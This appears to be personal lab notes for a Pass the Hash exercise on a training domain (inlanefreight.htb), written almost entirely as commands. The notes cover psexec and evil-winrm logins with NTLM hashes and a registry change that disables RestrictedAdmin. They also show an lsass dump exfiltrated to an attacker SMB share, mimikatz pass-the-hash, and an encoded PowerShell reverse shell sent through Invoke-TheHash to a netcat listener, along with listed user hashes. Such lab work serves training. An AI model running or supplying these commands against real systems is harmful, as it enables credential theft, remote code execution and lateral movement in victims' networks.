Pass the Hash (PtH)
June 10, 2024
Administrator:30B3783CE2ABF1AF70F77D0660CF3453impacket-psexec Administrator@10.129.74.50 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
First we have to enable the pass the hash method to the machine via evil-winrm
./evil-winrm.rb -i 10.129.74.50 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
As we enable the passthehach technique we can now use xfreerdp to rdp into the machine
xfreerdp /v:10.129.74.50 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 
# First we have to setup the server
mkdir TmpShare
sudo impacket-smbserver share -smb2support TmpShare
# Then we will move the lsass.dmp from windows to attacker machine
move C:\Users\ADMINI~1\AppData\Local\Temp\2\lsass.DMP \\10.10.14.147\share
Then we will just use pypykatz to view our lsass.dmp
pypykatz lsa minidump lsass.DMP 
david:c39f2beb3d2ec06a62cb887fb391dee0As we enter the command below it will execute the mimikatz and it will spawn up a new cmd for us
mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe" exitNow we can read the david .txt as david user which is possible via PTH
Now we will run the exact command but as julio user
We get the ntlm hash from the pypykatz earlier so will be using that in mimikatz
Now we can read the julio.txt using this method
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:cmd.exe" exit
First we need to make a reverse shell for our machine
Attacker Machine IP / MS01 - 172.16.1.05
Victim Machine IP / DC01 - 172.16.1.10
Then we will just open up a cmd as administrator and use it as powershell
powershell
cd Tools\Invoke-TheHash
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
nc -lnvp 443
whoami
cd C:\julio
dir
more flag.txt
pypykatz lsa minidump lsass.DMP
john:c4b0e1b10c7ce2c4723b4e2407ef81a2./evil-winrm.rb -i 10.129.230.115 -u john -H c4b0e1b10c7ce2c4723b4e2407ef81a2
Last updated